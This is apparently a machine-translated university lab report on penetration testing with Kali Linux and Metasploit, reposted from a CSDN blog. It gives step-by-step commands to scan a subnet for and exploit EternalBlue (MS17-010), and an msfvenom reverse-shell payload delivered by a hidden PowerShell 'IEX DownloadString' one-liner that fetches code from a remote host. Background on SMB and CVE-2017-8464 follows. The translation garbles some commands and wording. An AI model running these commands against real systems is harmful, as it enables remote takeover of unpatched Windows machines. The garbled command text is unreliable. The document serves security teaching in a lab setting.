情報システムのセキュリティ - KALI および Metasploit に基づく侵入テスト

実験 2   KALIMetasploitに基づく ペネトレーションテスト   

2.1 実験名

 KALI  Metasploitに基づく ペネトレーションテスト」

2.2 実験の目的

1. 侵入テスト手法に精通している

2. ペネトレーション テスト ツール Kali および Metasploit の使用に精通している

2.3 実験手順と内容

1.Kaliシステムインストールする  

2. Kali1 ~ 2 つの攻撃ツールを選択し    

攻撃 1:  MSFを使用して「エターナル ブルー」の脆弱性を再現する

実験環境: Win 7 (ファイアウォールをオフにし、 SMB サービスを有効にします)。

Kali  Linux metasploit -フレームワーク 6.2.26

  1Metasploitを起動_ 

ターミナルに「msfconsole」と入力します。

2  クエリ利用モジュール

ターミナルに「search  ms 17_010」 と入力して、使用できるモジュールを確認します。

3  検出モジュールを使用する

 ターミナルに「useaux /  scanner / smb / smb_ms17_010 入力します

4  検知範囲を設定する

 RHOSTSを設定する必要があるターミナルにshow  options を入力します 

 ターミナルにset  rhosts  192.168.3.0/24 と入力します(現在のネットワーク セグメントをスキャンするように設定します)  または、範囲 セット rhosts  192.168.3.1 192.168.3.10を設定できます。

5  検出開始

 ターミナルで「run」 と入力して検出を実行します。

上の図によると、 IPアドレス 192.168.3.8  のマシンに脆弱性がある可能性があることがわかります。  

6  脆弱性の悪用を開始する

まずターミナルに 「search  ms 17_010」と入力し 、モジュール useを使用します。

エクスプロイト/ Windows / smb / ms 17_010_eternalblue _

7  利用モジュールの設定

モジュールshow  optionsを設定して  、ターゲット マシンセット rhost  192.168.3.8 を設定します。  ここで、 5 番目の手順で検出された IPを入力します  

8  攻撃を実行する

ターミナルで 「 run 」と入力します  勝利が 見えたということは、攻撃が成功し、 メータープレッターを獲得したことを意味します

攻撃2:「Stuxnet III」リバウンド シェル

実験環境: Win 10 (ファイアウォールはオフ)。

Kali  Linux metasploit -フレームワーク 6.2.26

1.  MSFを使用して バックドアを作成する 

msf  内に次のように入力します: msfvenom   -p windows   /x64/ meterpreter / reverse _ tcp lhost = 192 .168.3.23  lport = 4456 - fpsh -reflection > / var / www / html / link . ps 1   

2.  kali Apache 2を開きます  

ターミナルに「service  apache 2 start」と入力します。

3. 制御対象マシンにショートカットを作成する

powershell        - windowstyle        hidden        - exec        bypass        -c " IEX        ( New -オブジェクト

ネットWebクライアント)。DownloadString (' http://192.168.204.135/link.ps1 '); テストps1

4   MSF端末に戻って モニタリングを設定します 

msf 内に入力します。exploit / multi / handlerを使用します。 

5  ペイロードの構成_ 

 ペイロード の設定windows /x64/ meterpreter / reverse _ tcp

msf と入力します: show  options  構成 ペイロード

LHOST  LPORT を設定しmaf に次のように入力します。

set  lhost  <現在のマシンの IP >   set  LHOST

set  lport  <空いているポート>   set  LPORT

6. モニタリングの実行

msf に入力します: run または exploit

ターゲット マシンに入り、ターゲット マシン上で作成したショートカットを実行し、 meterpreter を取得するまで少し待ち ます

2.4 主要な実験プロセスと分析

攻撃 1:  MSFを使用して 「エターナル ブルー 」の脆弱性を再現する

CVE -2017-0144 (エターナル ブルーとしても知られています) は、  2017 年4 月14 日のに初めて発生しました。これは、  WindowsシステムSMBプロトコルの脆弱性を利用して、システムの最高権限を取得し、侵害されたデータを制御する手法です。コンピューター。2017年         5月12日にも、犯罪者が「エターナルブルー」を改変してランサムウェアウイルス、世界中で大規模なランサムウェア攻撃を引き起こし、学校や大企業、政府などの機関にも影響    を及ぼしました。ファイル

SMBはプロトコル サーバー情報ブロックです。クライアント /サーバー、要求/応答プロトコルです。SMB プロトコルを通じて、ファイル、プリンター、名前付きパイプなどのリソースコンピューター間で共有できます。コンピューター上のネットワーク ネイバーフッドはSMB  によって実装されます。 SMBプロトコルはアプリケーション層とセッション層で動作し、 TCP / IPプロトコルの上で使用できます。SMBTCP ポート 139        TCPポート445を使用します 

SMB の仕組み:

( 1 ) まず、クライアントは SMB  negport  要求データグラムを送信し、サポートするすべてのSMBプロトコルバージョンをリストしますリクエスト メッセージを受信した後、サーバーはリクエストに応答し、使用するSMBプロトコルのバージョンをリストします。     使用できるプロトコルバージョンがない場合は0XFFFFHを返し、通信を終了します。  

( 2 ) プロトコルが決定された後、クライアント プロセスは、 SessionupX リクエスト パケットを送信することによって、サーバーに対するユーザー認証または共有認証を開始します。クライアントはユーザー名とパスワード、または単純なパスワードをサーバーに送信し、サーバーは接続 を許可または拒否するためのSessionupX応答パケットを送信します 

( 3 ) クライアントとサーバーがネゴシエーションと認証を完了すると、 Tconまたは TconX  SMB データグラムを送信して 、アクセスしたいネットワーク リソースの名前をリストし、 接続 TconX応答データグラムを送信します。または拒否します。

( 4 ) 対応するリソースに接続した後、SMB クライアントは、 open  SMBを通じて ファイルを開き、  read  SMB を通じてファイルを読み取り、 write  SMBを通じてファイルに書き込み  close  SMBを通じてファイルを閉じることができます 

Eternal Blue は、 Windows SMB サービスが SMB v1 リクエストを処理するときに発生する脆弱攻撃 者がターゲット システム上で任意のコードを実行することを可能にします Eternal Blue の脆弱性により、 445ファイル共有ポートが開いているWindowsマシンがスキャンされ、ユーザーの操作なしに、電源がオンになっている限り、犯罪者はコンピュータやサーバーに       ランサムウェアプログラム。

攻撃2:「Stuxnet III  」リバウンド シェル

2017 年6 13 日、Microsoft はCVE-2017-8464という番号の脆弱性情報を正式にリリースし、 Windowsシステムにはショートカットの解析時にリモートで任意のコードが実行される危険性の高い脆弱性があり、ハッカーは Uディスクを介してこの脆弱性をトリガーできると紹介しました。脆弱性、ユーザー システムの完全な制御、およびセキュリティ リスクの高一般にlnkですlnkは、 Windowsシステムのアプリケーション ショートカット ファイルのファイル タイプのサフィックスです。攻撃されたマシンが攻撃的lnkを含む USB ディスクを挿入すると            シェルがリバウンドしますインターネットにアクセスできずに隔離されたイントラネットであっても攻撃される可能性があります。  

この脆弱性により、悪意のあるショートカットが作成され、悪意のある実行スクリプトが含まれ、悪意のあるショートカットをクリックすると、コンピュータがウイルスに感染して遠隔操作される可能性があります。

おすすめ

転載: blog.csdn.net/weixin_49816179/article/details/135440845